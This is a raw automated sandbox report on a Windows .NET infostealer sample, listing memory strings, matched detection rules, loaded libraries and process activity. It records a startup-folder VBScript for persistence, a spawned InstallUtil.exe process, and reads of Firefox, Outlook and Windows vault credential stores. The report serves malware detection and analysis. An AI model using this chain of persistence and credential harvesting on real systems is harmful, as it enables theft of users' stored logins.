                      Source: Ref#1550238.exe, 00000000.00000002.2527496327.00000000068C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameElzzhhjql.dll" vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameElzzhhjql.dll" vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRef.exe8 vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.00000000039F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000000.1505905431.00000000002B2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRef.exe8 vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000002.2509223302.00000000028B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000002.2509223302.00000000026F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Ref#1550238.exe
                      Source: Ref#1550238.exeBinary or memory string: OriginalFilenameRef.exe8 vs Ref#1550238.exe
                      Source: Ref#1550238.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 0.2.Ref#1550238.exe.3a34098.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 5.2.vdvfyt.exe.38777e0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 5.2.vdvfyt.exe.38777e0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Ref#1550238.exe.3a34098.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Ref#1550238.exe, ElementProcessor.csCryptographic APIs: 'TransformFinalBlock'
                      Source: vdvfyt.exe.0.dr, ElementProcessor.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#1550238.exe.3afa8f8.2.raw.unpack, ElementProcessor.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/3@2/3
                      Source: C:\Users\user\Desktop\Ref#1550238.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs"
                      Source: Ref#1550238.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Ref#1550238.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Ref#1550238.exeReversingLabs: Detection: 44%
                      Source: C:\Users\user\Desktop\Ref#1550238.exeFile read: C:\Users\user\Desktop\Ref#1550238.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Ref#1550238.exe "C:\Users\user\Desktop\Ref#1550238.exe"
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\vdvfyt.exe "C:\Users\user\AppData\Roaming\vdvfyt.exe"
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: Ref#1550238.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Ref#1550238.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
